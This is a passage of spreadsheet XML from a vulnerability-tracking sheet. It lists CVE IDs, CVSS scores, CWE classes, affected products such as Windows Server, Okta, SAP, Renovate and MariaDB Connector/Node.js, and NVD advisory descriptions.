    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71329</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71348</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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3" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76227</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-526</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 42.68.1 before 42.96.3 (and from 42.68.1 before 43.4.4), including corresponding Docker images (renovate/renovate, mend/renovate-ce, renovate-ee-server, renovate-ee-worker &gt;=13.3.0 &lt;13.6.0), fail to restrict environment variables to an allowlist when spawning child processes. As a result, child processes (e.g. npm install, postUpgradeTasks, postUpdateOptions) gain full access to all environment variables of the Renovate process, allowing insider or outside attackers to exfiltrate secrets accessible to the Renovate deployment.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76227</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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5" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K346"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46" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78579</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="R347"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S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71339</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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48" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78625</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R349"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S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78630</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R350"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S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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51" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78545</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R352"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S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78550</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R353"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S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44766</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Intercompany Matching and Reconciliation) allows a low-privileged authenticated user to inject malicious input into certain functions, which may be processed by the database without proper validation. This could allow the user to access sensitive information, resulting in high impact on confidentiality, with no impact on integrity and availability of the application.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55545</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs WebSocket subscription handlers fail to enforce the privileges required by equivalent REST endpoints. PacketsApi.subscribePackets exposes the packets WebSocket topic without ObjectPrivilegeType.ReadPacket, ProcessingApi.subscribeAlgorithmStatus exposes the algorithm-status WebSocket topic without ObjectPrivilegeType.ReadAlgorithm, and MdbOverrideApi.subscribeMdbChanges exposes the mdb-changes WebSocket topic without SystemPrivilege.GetMissionDatabase. A low-privilege authenticated user can receive telemetry packets, algorithm status, and mission database change information outside the assigned authorization scope. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55545</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55855</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-89</t>
        </is>
      </c>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js permits SQL injection when attacker-controlled Buffer parameters are escaped client-side under the big5, gbk, sjis, cp932, or gb18030 client character sets. PacketOutputStream.writeBufferEscape in lib/io/packet-output-stream.js escaped bytes without the charset-aware getMbRecognizer logic in lib/misc/charset-mb.js. The server SQL lexer runs my_ismbchar before escape processing, so an attacker-controlled lead byte can consume the inserted 0x5C backslash as a multibyte trail byte and leave the following 0x27 quote unescaped, terminating the string literal and allowing arbitrary SQL. The default utf8mb4 character set and parameters sent through the execute binary prepared-statement path are not affected. Successful exploitation can expose or modify data available to the database account. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55855</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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57" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66816</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67369</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
